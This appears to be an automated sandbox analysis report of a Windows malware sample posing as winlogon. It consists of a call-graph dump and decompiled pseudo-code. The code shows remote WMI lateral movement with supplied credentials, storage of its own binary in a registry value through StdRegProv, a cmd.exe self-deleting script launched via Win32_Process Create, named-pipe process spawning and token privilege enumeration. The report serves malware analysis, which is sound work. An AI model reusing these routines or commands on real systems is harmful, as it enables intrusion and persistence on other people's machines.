13653->13636 14138 d6a550 13653->14138 13667 d6397b 13666->13667 13675 d63b5b 13666->13675 13667->13675 14247 d61f60 InitializeCriticalSection 13667->14247 13668 d6abe4 
__Stoull 5 API calls 13669 d63b86 13668->13669 13669->13427 13671 d639a6 14248 d636a0 13671->14248 13673 d63b3d DeleteCriticalSection 13674 d68340 25 API calls 13673->13674 13674->13675 13675->13668 13676 d63b62 13677 d6b97b 28 API calls 13676->13677 13677->13675 13678 d639ba ___scrt_get_show_window_mode 13678->13673 13678->13676 13679 d63a1f LogonUserA 13678->13679 14261 d62540 13678->14261 13679->13678 13680 d63a48 GetLastError 13679->13680 13680->13678 13683 d63bd0 13682->13683 13690 d63d6e 13682->13690 13684 d63bd8 InitializeCriticalSection 13683->13684 13683->13690 13685 d636a0 47 API calls 13684->13685 13691 d63c17 ___scrt_get_show_window_mode 13685->13691 13686 d6abe4 __Stoull 5 API calls 13687 d63d99 13686->13687 13687->13421 13688 d63d50 DeleteCriticalSection 13689 d68340 25 API calls 13688->13689 13689->13690 13690->13686 13691->13688 13691->13691 13692 d63d75 13691->13692 13694 d62540 30 API calls 13691->13694 13693 d6b97b 28 API calls 13692->13693 13693->13690 13694->13691 13696 d6ffe8 13695->13696 13697 d6fffc 13695->13697 13698 d72122 __freea 19 API calls 13696->13698 13701 d6fff8 __alldvrm 13697->13701 13703 d74ef7 13697->13703 13700 d6ffed 13698->13700 13702 d70269 ___std_exception_copy 25 API calls 13700->13702 13701->13572 13702->13701 13704 d74c37 _GetRangeOfTrysToCheck 5 API calls 13703->13704 13705 d74f1e 13704->13705 13706 d74f2a 13705->13706 13707 d74f36 GetSystemTimeAsFileTime 13705->13707 13708 d6abe4 __Stoull 5 API calls 13706->13708 13707->13706 13709 d74f47 13708->13709 13709->13701 13711 d71f70 13710->13711 13715 d71f76 13710->13715 13712 d74e48 _GetRangeOfTrysToCheck 11 API calls 13711->13712 13712->13715 13713 d71890 _GetRangeOfTrysToCheck 19 API calls 13714 d71f88 13713->13714 13716 d71f90 13714->13716 13718 d74e9e _GetRangeOfTrysToCheck 11 API calls 13714->13718 13715->13713 13717 d71fc5 SetLastError 13715->13717 13719 d717c5 __freea 19 API calls 13716->13719 13717->13575 13720 d71fa5 13718->13720 13721 d71f96 13719->13721 
13720->13716 13722 d71fac 13720->13722 13723 d71fd1 SetLastError 13721->13723 13724 d71dcc _GetRangeOfTrysToCheck 19 API calls 13722->13724 13730 d7184d 13723->13730 13725 d71fb7 13724->13725 13728 d717c5 __freea 19 API calls 13725->13728 13729 d71fbe 13728->13729 13729->13717 13729->13723 13741 d77937 13730->13741 13734 d71867 IsProcessorFeaturePresent 13736 d71872 13734->13736 13739 d7009f __CreateFrameInfo 8 API calls 13736->13739 13737 d7185d 13737->13734 13740 d71885 13737->13740 13739->13740 13771 d70e00 13740->13771 13774 d778a5 13741->13774 13744 d77992 13745 d7799e _GetRangeOfTrysToCheck 13744->13745 13746 d71fde __CreateFrameInfo 19 API calls 13745->13746 13747 d779c5 __CreateFrameInfo 13745->13747 13750 d779cb __CreateFrameInfo 13745->13750 13746->13747 13748 d77a17 13747->13748 13747->13750 13751 d779fa 13747->13751 13749 d72122 __freea 19 API calls 13748->13749 13752 d77a1c 13749->13752 13758 d77a43 13750->13758 13787 d75c0f EnterCriticalSection 13750->13787 13796 d7d7c9 13751->13796 13753 d70269 ___std_exception_copy 25 API calls 13752->13753 13753->13751 13761 d77aa2 13758->13761 13762 d77a9a 13758->13762 13768 d77acd 13758->13768 13788 d75c57 LeaveCriticalSection 13758->13788 13760 d70e00 __CreateFrameInfo 27 API calls 13760->13761 13761->13768 13789 d77989 13761->13789 13762->13760 13766 d71f5a _GetRangeOfTrysToCheck 37 API calls 13769 d77b30 13766->13769 13767 d77989 __CreateFrameInfo 37 API calls 13767->13768 13792 d77b52 13768->13792 13769->13751 13770 d71f5a _GetRangeOfTrysToCheck 37 API calls 13769->13770 13770->13751 13800 d70c0f 13771->13800 13777 d7784b 13774->13777 13776 d71852 13776->13737 13776->13744 13778 d77857 ___InternalCxxFrameHandler 13777->13778 13783 d75c0f EnterCriticalSection 13778->13783 13780 d77865 13784 d77899 13780->13784 13782 d7788c ___InternalCxxFrameHandler 13782->13776 13783->13780 13785 d75c57 __CreateFrameInfo LeaveCriticalSection 13784->13785 13786 d778a3 13785->13786 13786->13782 13787->13758 13788->13762 13790 
d71f5a _GetRangeOfTrysToCheck 37 API calls 13789->13790 13791 d7798e 13790->13791 13791->13767 13793 d77b58 13792->13793 13795 d77b21 13792->13795 13799 d75c57 LeaveCriticalSection 13793->13799 13795->13751 13795->13766 13795->13769 13797 d6abe4 __Stoull 5 API calls 13796->13797 13798 d7d7d4 13797->13798 13798->13798 13799->13795 13801 d70c1b _GetRangeOfTrysToCheck 13800->13801 13803 d6b554 __CreateFrameInfo GetModuleHandleW 13801->13803 13809 d70c33 13801->13809 13805 d70c27 13803->13805 13804 d70c3b 13819 d70cb0 13804->13819 13820 d70cd9 13804->13820 13830 d71401 13804->13830 13805->13809 13822 d70d69 GetModuleHandleExW 13805->13822 13829 d75c0f EnterCriticalSection 13809->13829 13810 d70cf6 13836 d70d28 13810->13836 13811 d70d22 13816 d7d7c9 __CreateFrameInfo 5 API calls 13811->13816 13812 d70b3c __CreateFrameInfo 5 API calls 13812->13820 13814 d70b3c __CreateFrameInfo 5 API calls 13817 d70cc8 13814->13817 13818 d70d27 13816->13818 13817->13812 13819->13814 13819->13817 13833 d70d19 13820->13833 13823 d70d93 GetProcAddress 13822->13823 13826 d70da8 13822->13826 13823->13826 13824 d70dc5 13827 d6abe4 __Stoull 5 API calls 13824->13827 13825 d70dbc FreeLibrary 13825->13824 13826->13824 13826->13825 13828 d70dcf 13827->13828 13828->13809 13829->13804 13844 d7113a 13830->13844 13847 d75c57 LeaveCriticalSection 13833->13847 13835 d70cf2 13835->13810 13835->13811 13848 d750bb 13836->13848 13845 d710e9 __CreateFrameInfo 19 API calls 13844->13845 13846 d7115e 13845->13846 13846->13819 13847->13835 13849 d750e0 13848->13849 13850 d750d6 13848->13850 13855 d67586 EnterCriticalSection 13854->13855 13856 d6757e 13854->13856 13857 d6759b 13855->13857 13858 d675c1 13855->13858 13856->13581 13857->13858 13860 d675a1 13857->13860 13859 d675b0 LeaveCriticalSection 13858->13859 13862 d683c0 28 API calls 13858->13862 13859->13581 13860->13859 13864 d683c0 13860->13864 13862->13859 13865 d683d6 13864->13865 13866 d6840e 13864->13866 13867 d68414 13865->13867 13868 d683ec 
13865->13868 13866->13859 13870 d6b95b 28 API calls 13867->13870 13872 d685e0 13868->13872 13871 d6841e 13870->13871 13873 d685f7 13872->13873 13874 d6b93e RaiseException 13873->13874 13875 d686bc 13874->13875 13876 d6b93e RaiseException 13875->13876 13877 d686c1 13876->13877 13880 d70279 13877->13880 13881 d701ee ___std_exception_copy 25 API calls 13880->13881 13882 d70288 13881->13882 13883 d70296 ___std_exception_copy 11 API calls 13882->13883 13884 d70295 13883->13884 13886 d62ed6 13885->13886 13887 d62edd 13886->13887 13888 d62eef GetCurrentProcess 13886->13888 13889 d6abe4 __Stoull 5 API calls 13887->13889 13890 d62f15 13888->13890 13891 d62eeb 13889->13891 13890->13887 13892 d62f1c OpenProcessToken 13890->13892 13891->13616 13892->13887 13893 d62f30 13892->13893 13893->13887 13937 d62820 13893->13937 13895 d62f4f 13895->13887 13896 d62f53 ___scrt_get_show_window_mode 13895->13896 13954 d62650 13896->13954 13898 d62f7b 13961 d6e837 13915->13961 13938 d6282e 13937->13938 13939 d62859 13938->13939 13940 d702c9 ___std_exception_copy 20 API calls 13938->13940 13939->13895 13941 d6288b 13940->13941 13942 d62894 13941->13942 13943 d628b0 IsValidSid 13941->13943 13951 d628ee 13941->13951 13942->13895 13944 d628bc GetLengthSid 13943->13944 13943->13951 13945 d628ca 13944->13945 13944->13951 13946 d702c9 ___std_exception_copy 20 API calls 13945->13946 13948 d7009a ___std_exception_copy 20 API calls 13950 d62906 13948->13950 13950->13895 13951->13948 13951->13950 13955 d62667 13954->13955 13956 d6266e 13955->13956 13957 d62673 LookupAccountSidW 13955->13957 13956->13898 13957->13898 13962 d6e864 13961->13962 13963 d6e873 13962->13963 13964 d6e88b 13962->13964 13975 d6e868 13962->13975 13966 d72122 __freea 19 API calls 13963->13966 13987 d6e412 13964->13987 13969 d6e878 13966->13969 13967 d6abe4 __Stoull 5 API calls 13971 d66230 13967->13971 13972 d70269 ___std_exception_copy 25 API calls 13969->13972 13970 d6ea38 13974 d6ea65 WideCharToMultiByte 13970->13974 13981 

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 25%
    			E00D64C30(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, short _a768, char _a2096, char _a2124, char _a3456, char _a3476, signed int _a5572, signed int _a5580) {
    				struct _OVERLAPPED* _v8;
    				char _v12;
    				short _v20;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				char _v52;
    				void _v56;
    				void* _v72;
    				intOrPtr* _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				struct _OVERLAPPED* _v108;
    				struct _OVERLAPPED* _v120;
    				intOrPtr* _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v144;
    				intOrPtr* _v176;
    				struct _OVERLAPPED* _v200;
    				intOrPtr _v220;
    				intOrPtr* _v224;
    				struct _OVERLAPPED* _v228;
    				intOrPtr _v236;
    				intOrPtr* _v244;
    				char _v248;
    				char _v252;
    				intOrPtr* _v260;
    				intOrPtr _v268;
    				short _v272;
    				struct _OVERLAPPED* _v276;
    				struct _OVERLAPPED* _v280;
    				long _v284;
    				intOrPtr* _v292;
    				long _v296;
    				char _v300;
    				char _v304;
    				void* _v312;
    				intOrPtr* _v316;
    				intOrPtr* _v336;
    				struct _OVERLAPPED* _v340;
    				void* _v344;
    				long _v348;
    				void* _v356;
    				intOrPtr* _v360;
    				void* _v364;
    				long _v368;
    				intOrPtr* _v372;
    				intOrPtr _v376;
    				intOrPtr* _v384;
    				struct _OVERLAPPED* _v392;
    				intOrPtr _v396;
    				intOrPtr* _v400;
    				intOrPtr _v404;
    				intOrPtr _v408;
    				intOrPtr* _v428;
    				void* _v436;
    				char _v440;
    				intOrPtr _v448;
    				intOrPtr* _v452;
    				signed int _t147;
    				signed int _t148;
    				void* _t152;
    				intOrPtr _t154;
    				intOrPtr _t157;
    				intOrPtr _t158;
    				void _t159;
    				intOrPtr _t160;
    				char* _t162;
    				intOrPtr _t170;
    				intOrPtr _t171;
    				intOrPtr _t172;
    				void* _t173;
    				intOrPtr* _t177;
    				intOrPtr* _t179;
    				intOrPtr* _t181;
    				intOrPtr _t183;
    				intOrPtr _t184;
    				void* _t185;
    				intOrPtr* _t188;
    				intOrPtr* _t190;
    				intOrPtr* _t192;
    				intOrPtr* _t194;
    				intOrPtr* _t196;
    				intOrPtr* _t200;
    				intOrPtr _t203;
    				intOrPtr* _t204;
    				intOrPtr _t207;
    				intOrPtr* _t208;
    				void* _t213;
    				intOrPtr* _t214;
    				intOrPtr* _t216;
    				intOrPtr* _t218;
    				long _t220;
    				long* _t221;
    				intOrPtr* _t223;
    				intOrPtr* _t225;
    				long _t227;
    				char* _t229;
    				intOrPtr* _t233;
    				void* _t234;
    				intOrPtr* _t235;
    				intOrPtr* _t237;
    				intOrPtr* _t239;
    				intOrPtr* _t243;
    				intOrPtr* _t245;
    				intOrPtr* _t247;
    				intOrPtr _t250;
    				intOrPtr _t252;
    				intOrPtr* _t253;
    				void* _t254;
    				intOrPtr _t255;
    				void* _t259;
    				intOrPtr* _t260;
    				intOrPtr* _t264;
    				intOrPtr* _t302;
    				intOrPtr* _t303;
    				intOrPtr* _t304;
    				intOrPtr _t308;
    				intOrPtr _t310;
    				void* _t311;
    				signed int _t312;
    				signed int _t313;
    
    				_t313 = _t312 & 0xfffffff8;
    				E00D7D900();
    				_t147 =  *0xd88004; // 0x276b9783
    				_t148 = _t147 ^ _t313;
    				_a5580 = _t148;
    				_t308 = _a4;
    				_t250 = __edx;
    				_a16 = __edx;
    				_a20 = __ecx;
    				_a12 = _t308;
    				__imp__CoInitializeEx(0, 0, __edi, __esi, __ebx);
    				if(_t148 >= 0) {
    					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 2, 0, 0, 0); // executed
    					if(_t148 >= 0 || _t148 == 0x80010119) {
    						_v8 = 0;
    						__imp__CredUIParseUserNameW(_t250,  &_a3476, 0x201,  &_a2124, 0x151);
    						_t152 = LocalAlloc(0x40, 0x1c);
    						_t302 = __imp__#2;
    						_v56 = _t152;
    						_t154 =  *_t302( &_a3456);
    						_v44 = _t154;
    						_t310 =  *_t302(_t308);
    						_t157 =  *_t302( &_a2096);
    						_t303 = __imp__#7;
    						_t252 = _t157;
    						_t158 =  *_t303(_t310);
    						_t259 = _v72;
    						 *((intOrPtr*)(_t259 + 0x10)) = _t310;
    						_t311 = _t259;
    						 *((intOrPtr*)(_t259 + 0x14)) = _t158;
    						_t159 = _v56;
    						 *_t311 = _t159;
    						_t160 =  *_t303(_t159);
    						 *((intOrPtr*)(_t311 + 4)) = _t160;
    						 *((intOrPtr*)(_t311 + 8)) = _t252;
    						 *((intOrPtr*)(_t311 + 0xc)) =  *_t303(_t252);
    						_t162 =  &_v52;
    						 *((intOrPtr*)(_t311 + 0x18)) = 2;
    						__imp__CoCreateInstance(0xd7f4b8, 0, 1, 0xd7f3e8, _t162);
    						_t304 = __imp__#6;
    						if(_t162 >= 0) {
    							wsprintfW( &_v20, L"\\\\%s\\root\\CIMV2", _v88);
    							_t253 = __imp__#2;
    							_t313 = _t313 + 0xc;
    							_t170 =  *_t253( &_v12);
    							_v84 = _t170;
    							_t171 =  *_t253(_v88);
    							_v84 = _t171;
    							_t172 =  *_t253(_v96);
    							_t260 = _v76;
    							_v108 = 0;
    							_v40 = _t172;
    							_t173 =  *((intOrPtr*)( *_t260 + 0xc))(_t260, _v92, _v88, _t172, 0, 0, 0, 0,  &_v108);
    							_t304 = __imp__#6; // 0x76fd3f8a
    							if(_t173 >= 0) {
    								__imp__CoSetProxyBlanket(_v144, 0xffffffff, 0xffffffff, 0xffffffff, 6, 3, _t311, 0);
    								if(_t173 >= 0) {
    									_t181 = _v176;
    									_v120 = 0;
    									 *((intOrPtr*)( *_t181))(_t181, 0xd7f2f0,  &_v120);
    									__imp__CoSetProxyBlanket(_v132, 0xffffffff, 0xffffffff, 0xffffffff, 6, 3, _t311, 0);
    									_t183 =  *_t253(L"SetBinaryValue");
    									_v220 = _t183;
    									_t184 =  *_t253(L"StdRegProv");
    									_t264 = _v228;
    									_v200 = 0;
    									_v236 = _t184;
    									_t185 =  *((intOrPtr*)( *_t264 + 0x18))(_t264, _t184, 0, 0,  &_v200, 0);
    									_t304 = __imp__#6;
    									if(_t185 < 0) {
    										_t254 = _v260;
    									} else {
    										_t188 = _v224;
    										_push(0);
    										_push( &_v228);
    										_push(0);
    										_push(_v248);
    										_v228 = 0;
    										_push(_t188);
    										if( *((intOrPtr*)( *_t188 + 0x4c))() < 0) {
    											_t190 = _v244;
    											_t254 = _v280;
    											 *((intOrPtr*)( *_t190 + 8))(_t190);
    										} else {
    											_t192 = _v248;
    											_push( &_v276);
    											_v276 = 0;
    											_push(0);
    											_push(_t192);
    											if( *((intOrPtr*)( *_t192 + 0x3c))() < 0) {
    												_t194 = _v260;
    												_t254 = _v292;
    												 *((intOrPtr*)( *_t194 + 8))(_t194);
    												_t196 = _v260;
    												 *((intOrPtr*)( *_t196 + 8))(_t196);
    											} else {
    												__imp__#9( &_v248);
    												_v244 = 0x80000001;
    												_v252 = 3;
    												_t200 = _v292;
    												 *((intOrPtr*)( *_t200 + 0x14))(_t200, L"hDefKey", 0,  &_v252, 0);
    												_v272 = 8;
    												_t203 =  *_t253(L"Environment");
    												_v268 = _t203;
    												_t204 = _v316;
    												 *((intOrPtr*)( *_t204 + 0x14))(_t204, L"sSubKeyName", 0,  &_v276, 0);
    												_v296 = 8;
    												_t207 =  *_t253(L"Data");
    												_v292 = _t207;
    												_t208 = _v340;
    												 *((intOrPtr*)( *_t208 + 0x14))(_t208, L"sValueName", 0,  &_v300, 0);
    												GetModuleFileNameW(0,  &_a768, 0x208);
    												_t213 = CreateFileW( &_a768, 0x80000000, 1, 0, 3, 0x80, 0);
    												_v344 = _t213;
    												if(_t213 == 0xffffffff) {
    													_t214 = _v360;
    													_t254 = _v364;
    													 *((intOrPtr*)( *_t214 + 8))(_t214);
    													_t216 = _v336;
    													 *((intOrPtr*)( *_t216 + 8))(_t216);
    													_t218 = _v336;
    													 *((intOrPtr*)( *_t218 + 8))(_t218);
    												} else {
    													_t220 = GetFileSize(_t213, 0);
    													_v348 = _t220;
    													_v284 = _t220;
    													_t221 =  &_v284;
    													_v280 = 0;
    													__imp__#15(0x11, 1, _t221);
    													_t255 = _t221;
    													if(_t255 == 0) {
    														L15:
    														_t254 = _v376;
    														goto L16;
    													} else {
    														_t229 =  &_v304;
    														__imp__#23(_t255, _t229);
    														if(_t229 < 0) {
    															goto L15;
    														} else {
    															ReadFile(_v364, _v312, _v368,  &_v296, 0);
    															__imp__#24(_t255);
    															_v336 = _t255;
    															_v344 = 0x2011;
    															_t233 = _v384;
    															_t234 =  *((intOrPtr*)( *_t233 + 0x14))(_t233, L"uValue", 0,  &_v344, 0);
    															_t254 = _v408;
    															if(_t234 < 0) {
    																L16:
    																CloseHandle(_v356);
    																_t223 = _v372;
    																 *((intOrPtr*)( *_t223 + 8))(_t223);
    																_t225 = _v348;
    																 *((intOrPtr*)( *_t225 + 8))(_t225);
    																_t227 = _v348;
    																 *((intOrPtr*)( *_t227 + 8))(_t227);
    															} else {
    																_t235 = _v400;
    																_push( &_v340);
    																_v392 = 0;
    																_push( &_v392);
    																_push(_v404);
    																_v340 = 0;
    																_push(0);
    																_push(0);
    																_push(_v396);
    																_push(_t254);
    																_push(_t235);
    																if( *((intOrPtr*)( *_t235 + 0x60))() < 0) {
    																	goto L16;
    																} else {
    																	_t237 = _v372;
    																	 *((intOrPtr*)( *_t237 + 0x18))(_t237, 0xffffffff,  &_v440);
    																	_t239 = _v436;
    																	 *((intOrPtr*)( *_t239 + 8))(_t239);
    																	E00D644B0(_v448);
    																	CloseHandle(_v436);
    																	_t243 = _v452;
    																	 *((intOrPtr*)( *_t243 + 8))(_t243);
    																	_t245 = _v428;
    																	 *((intOrPtr*)( *_t245 + 8))(_t245);
    																	_t247 = _v428;
    																	 *((intOrPtr*)( *_t247 + 8))(_t247);
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    									 *_t304(_v248);
    									 *_t304(_t254);
    								}
    								_t179 = _v176;
    								 *((intOrPtr*)( *_t179 + 8))(_t179);
    							}
    							 *_t304(_v128);
    							 *_t304(_v80);
    							 *_t304(_v132);
    							_t177 = _v124;
    							 *((intOrPtr*)( *_t177 + 8))(_t177);
    						}
    						 *_t304( *((intOrPtr*)(_t311 + 8)));
    						 *_t304( *((intOrPtr*)(_t311 + 0x10)));
    						 *_t304( *_t311);
    						LocalFree(_t311);
    					}
    					__imp__CoUninitialize();
    				}
    				return E00D6ABE4(_a5572 ^ _t313);
			}

    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 00D64C66
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D64C86
    • CredUIParseUserNameW.CREDUI(?,?,00000201,?,?,?,?,?,?,?,?,?,?,?,00000151), ref: 00D64CBE
    • LocalAlloc.KERNEL32(00000040,0000001C,?,?,00000201,?), ref: 00D64CC8
    • SysAllocString.OLEAUT32(?), ref: 00D64CE0
    • SysAllocString.OLEAUT32(?), ref: 00D64CE7
    • SysAllocString.OLEAUT32(?), ref: 00D64CF3
    • SysStringLen.OLEAUT32(00000000), ref: 00D64CFE
    • SysStringLen.OLEAUT32(?), ref: 00D64D13
    • SysStringLen.OLEAUT32(00000000), ref: 00D64D1C
    • CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D64D3B
    • wsprintfW.USER32 ref: 00D64D5D
    • SysAllocString.OLEAUT32(?), ref: 00D64D71
    • SysAllocString.OLEAUT32(?), ref: 00D64D7B
    • SysAllocString.OLEAUT32(?), ref: 00D64D85
    • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D64DD2
    • CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D64E0C
    • SysAllocString.OLEAUT32(SetBinaryValue), ref: 00D64E17
    • SysAllocString.OLEAUT32(StdRegProv), ref: 00D64E22
    • VariantClear.OLEAUT32(?), ref: 00D64EA1
    • SysAllocString.OLEAUT32(Environment), ref: 00D64EE0
    • SysAllocString.OLEAUT32(Data), ref: 00D64F0D
    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?), ref: 00D64F3A
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00D64F5A
    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 00D64F70
    • SafeArrayCreate.OLEAUT32 ref: 00D64F8F
    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D64FA5
    • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D64FC6
    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00D64FCD
      • Part of subcall function 00D644B0: SysAllocString.OLEAUT32(Create), ref: 00D644C6
      • Part of subcall function 00D644B0: SysAllocString.OLEAUT32(Win32_Process), ref: 00D644CF
      • Part of subcall function 00D644B0: SysAllocString.OLEAUT32(cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^("Scripting.FileSystemObject"^) & echo.FSO.DeleteF), ref: 00D6453A
      • Part of subcall function 00D644B0: SysFreeString.OLEAUT32(?), ref: 00D64597
      • Part of subcall function 00D644B0: SysFreeString.OLEAUT32(00000000), ref: 00D645B5
      • Part of subcall function 00D644B0: SysFreeString.OLEAUT32(?), ref: 00D645BA
    • CloseHandle.KERNEL32(00000000), ref: 00D65062
    • CloseHandle.KERNEL32(?), ref: 00D65093
    • SysFreeString.OLEAUT32(00000000), ref: 00D6510F
    • SysFreeString.OLEAUT32(00000000), ref: 00D65112
    • SysFreeString.OLEAUT32(?), ref: 00D65122
    • SysFreeString.OLEAUT32(?), ref: 00D65128
    • SysFreeString.OLEAUT32(?), ref: 00D6512E
    • SysFreeString.OLEAUT32(?), ref: 00D6513D
    • SysFreeString.OLEAUT32(?), ref: 00D65142
    • SysFreeString.OLEAUT32(?), ref: 00D65146
    • LocalFree.KERNEL32(?,?,?,00000201,?,?,?,?,?,?,?,?,?,?,?,00000151), ref: 00D65149
    • CoUninitialize.OLE32 ref: 00D6514F
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph

    C-Code - Quality: 91%
    			E00D634B0(WCHAR* __ecx, char __edx, intOrPtr _a4, intOrPtr* _a8) {
    				long _v8;
    				int _v12;
    				long _v16;
    				struct _OVERLAPPED _v36;
    				intOrPtr _v124;
    				char _v144;
    				char _v148;
    				void* __edi;
    				void* _t33;
    				void* _t34;
    				int _t36;
    				void* _t45;
    				int _t48;
    				long _t49;
    				long _t50;
    				long _t55;
    				int _t56;
    				char _t65;
    				intOrPtr _t66;
    				int _t70;
    				void* _t71;
    				void* _t72;
    
    				_t65 = __edx;
    				if(__ecx == 0 || __edx == 0 || _a8 == 0) {
    					L7:
    					return 0;
    				} else {
    					_v12 = 0;
    					_t33 = CreateNamedPipeW(__ecx, 0x40000001, 0, 1, 0, 0x19000, 0xea60, 0); // executed
    					_t72 = _t33;
    					if(_t72 == 0 || _t72 == 0xffffffff) {
    						goto L7;
    					} else {
    						_v36.Internal = 0;
    						_v36.InternalHigh = 0;
    						_v36.Offset = 0;
    						_v36.OffsetHigh = 0;
    						_v36.hEvent = 0;
    						_t34 = CreateEventW(0, 1, 0, 0);
    						_v36.hEvent = _t34;
    						if(_t34 != 0) {
    							_t36 = ConnectNamedPipe(_t72,  &_v36); // executed
    							_t70 = _t36;
    							_v8 = GetLastError();
    							E00D6D520(_t70,  &_v144, 0, 0x6c);
    							_t68 =  &_v148;
    							_v148 = _t65;
    							_v144 = _a4;
    							_v124 = 0x44;
    							if(E00D6AA90( &_v148) != 0) {
    								if(_t70 == 0) {
    									_t55 = _v8;
    									if(_t55 == 0x217) {
    										_t70 = 1;
    									} else {
    										if(_t55 == 0x3e5) {
    											_t56 = WaitForSingleObject(_v36.hEvent, 0xea60);
    											if(_t56 != 0) {
    												CancelIo(_t72);
    											} else {
    												_t70 = GetOverlappedResult(_t72,  &_v36,  &_v16, _t56);
    											}
    										}
    									}
    								}
    								CloseHandle(_v36.hEvent);
    								if(_t70 != 0) {
    									_push(0x19000); // executed
    									_t45 = E00D702C9(_t68); // executed
    									_t71 = _t45;
    									if(_t71 != 0) {
    										E00D6D520(_t71, _t71, 0, 0x19000);
    										_v8 = 0;
    										_t48 = ReadFile(_t72, _t71, 0x19000,  &_v8, 0); // executed
    										if(_t48 != 0) {
    											_t49 = _v8;
    											if(_t49 != 0) {
    												_t50 = _t49 + 2;
    												_push(_t50);
    												_v16 = _t50;
    												_t66 = E00D702C9(_t68);
    												 *_a8 = _t66;
    												if(_t66 != 0) {
    													E00D6D520(_t71, _t66, 0, _v16);
    													E00D7DAE0(_t66, _t71, _v8);
    													_v12 = 1;
    												}
    											}
    										}
    									}
    								}
    								CloseHandle(_t72);
    								return _v12;
    							} else {
    								CloseHandle(_t72);
    								CloseHandle(_v36.hEvent);
    								return 0;
    							}
    						} else {
    							CloseHandle(_t72);
    							goto L7;
    						}
    					}
    				}
			}

    APIs
    • CreateNamedPipeW.KERNELBASE(?,40000001,00000000,00000001,00000000,00019000,0000EA60,00000000,00000000,773F423D,?), ref: 00D634EB
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00D63527
    • CloseHandle.KERNEL32(00000000), ref: 00D63535
    • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 00D63549
    • GetLastError.KERNEL32 ref: 00D63551
      • Part of subcall function 00D6AA90: CreateProcessW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D6AAB8
      • Part of subcall function 00D6AA90: GetLastError.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,00D6358E), ref: 00D6AAC4
    • CloseHandle.KERNEL32(00000000), ref: 00D63599
    • CloseHandle.KERNEL32(00000000), ref: 00D6359E
    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00D635C6
    • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D635DA
    • CancelIo.KERNEL32(00000000), ref: 00D635E5
    • CloseHandle.KERNEL32(00000000), ref: 00D635F5
    • ReadFile.KERNEL32(00000000,00000000,00019000,00000000,00000000), ref: 00D6363A
    • CloseHandle.KERNEL32(00000000), ref: 00D63685
    Strings

    Control-flow Graph

    C-Code - Quality: 69%
    			E00D62B90(void* __ebx, void* __edi, void* __esi) {
    				signed int _v8;
    				signed int _v12;
    				short _v540;
    				int _v544;
    				struct _TOKEN_PRIVILEGES _v556;
    				long _v564;
    				long _v568;
    				long _v572;
    				void* _v576;
    				void* _v580;
    				signed int _t28;
    				int _t34;
    				int _t40;
    				int _t46;
    				void* _t54;
    				void* _t56;
    				void* _t57;
    				void* _t65;
    				struct _LUID* _t70;
    				signed int _t72;
    				signed int _t74;
    
    				_t74 = (_t72 & 0xfffffff8) - 0x23c;
    				_t28 =  *0xd88004; // 0x276b9783
    				_v8 = _t28 ^ _t74;
    				_v572 = 0xffffffff;
    				if(OpenProcessToken(GetCurrentProcess(), 0xf01ff,  &_v572) != 0) {
    					_v568 = 0;
    					_t34 = GetTokenInformation(_v572, 3, 0, 0,  &_v568); // executed
    					if(_t34 == 0) {
    						_push(_v572);
    						_t54 = E00D702C9(_t56);
    						_t74 = _t74 + 4;
    						if(_t54 != 0) {
    							_t40 = GetTokenInformation(_v576, 3, _t54, _v572,  &_v572); // executed
    							if(_t40 != 0) {
    								_t65 = 0;
    								if( *_t54 > 0) {
    									_t12 = _t54 + 4; // 0x4
    									_t70 = _t12;
    									asm("o16 nop [eax+eax]");
    									do {
    										E00D6D520(_t65,  &_v540, 0, 0x208);
    										_t74 = _t74 + 0xc;
    										_v572 = 0x104;
    										_t46 = LookupPrivilegeNameW(0, _t70,  &_v540,  &_v572); // executed
    										if(_t46 != 0 &&  *((intOrPtr*)(_t70 + 8)) == 0) {
    											asm("xorps xmm0, xmm0");
    											_v568 = _t70->LowPart;
    											asm("movq [esp+0x28], xmm0");
    											_v564 = _t70->HighPart;
    											asm("movq [esp+0x3c], xmm0");
